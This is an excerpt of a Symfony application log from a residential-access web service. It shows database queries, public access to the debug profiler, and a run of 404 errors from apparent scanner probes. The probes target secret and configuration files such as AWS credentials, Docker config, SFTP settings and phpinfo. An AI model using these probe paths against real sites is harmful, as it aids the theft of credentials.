  7903. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  7904. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  7905. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  7906. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  7907. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  7908. [2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  7909. [2025-12-20 19:30:43] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  7910. [2025-12-20 19:33:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03665","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b03665?panel=validator","method":"GET"} []
  7911. [2025-12-20 19:33:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  7912. [2025-12-20 19:41:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=security","method":"GET"} []
  7913. [2025-12-20 19:41:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  7914. [2025-12-20 19:42:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=cache","method":"GET"} []
  7915. [2025-12-20 19:42:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7916. [2025-12-20 19:45:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8e8b4b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8e8b4b","method":"GET"} []
  7917. [2025-12-20 19:45:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  7918. [2025-12-20 19:53:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"993d28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/993d28?panel=time","method":"GET"} []
  7919. [2025-12-20 19:53:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7920. [2025-12-20 19:54:50] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7921. [2025-12-20 19:54:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.aws-secrets"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.aws-secrets\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7922. [2025-12-20 19:54:55] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7923. [2025-12-20 19:54:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.aws/config"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.aws/config\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7924. [2025-12-20 19:54:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.aws/credentials"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.aws/credentials\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7925. [2025-12-20 19:54:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.cirrus.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.cirrus.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7926. [2025-12-20 19:55:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.docker/config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.docker/config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7927. [2025-12-20 19:55:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.drone.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.drone.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7928. [2025-12-20 19:55:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.jaynes.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.jaynes.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7929. [2025-12-20 19:55:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.lakectl.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.lakectl.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7930. [2025-12-20 19:55:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.local"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.local\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7931. [2025-12-20 19:55:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.production"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.production\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7932. [2025-12-20 19:55:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7933. [2025-12-20 19:55:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.remote"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.remote\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7934. [2025-12-20 19:55:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.ssh/sftp-config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.ssh/sftp-config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7935. [2025-12-20 19:55:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.sync.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.sync.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7936. [2025-12-20 19:56:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.travis.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.travis.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7937. [2025-12-20 19:56:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/settings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/settings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7938. [2025-12-20 19:56:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7939. [2025-12-20 19:56:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.wp-config.php.swp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.wp-config.php.swp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7940. [2025-12-20 19:56:40] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?phpinfo=1","method":"GET"} []
  7941. [2025-12-20 19:57:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /AWS/AWSDetails.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /AWS/AWSDetails.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7942. [2025-12-20 19:58:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /AWSCredentials.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /AWSCredentials.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7943. [2025-12-20 19:58:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /AWSDetails.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /AWSDetails.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7944. [2025-12-20 19:58:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Client/netlify.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Client/netlify.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7945. [2025-12-20 19:58:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Cloud.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Cloud.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7946. [2025-12-20 19:58:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /DOCS.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /DOCS.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7947. [2025-12-20 19:58:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Docker.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Docker.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7948. [2025-12-20 19:58:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /IAM.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /IAM.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7949. [2025-12-20 19:58:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /LOG.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /LOG.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7950. [2025-12-20 19:58:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /NOTES.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /NOTES.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7951. [2025-12-20 19:58:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Properties/launchSettings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Properties/launchSettings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7952. [2025-12-20 19:59:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /README.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /README.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7953. [2025-12-20 19:59:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /SendMail.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /SendMail.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7954. [2025-12-20 19:59:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_config.rb.erb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_config.rb.erb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7955. [2025-12-20 19:59:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_config.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_config.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7956. [2025-12-20 19:59:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_config_base.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_config_base.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
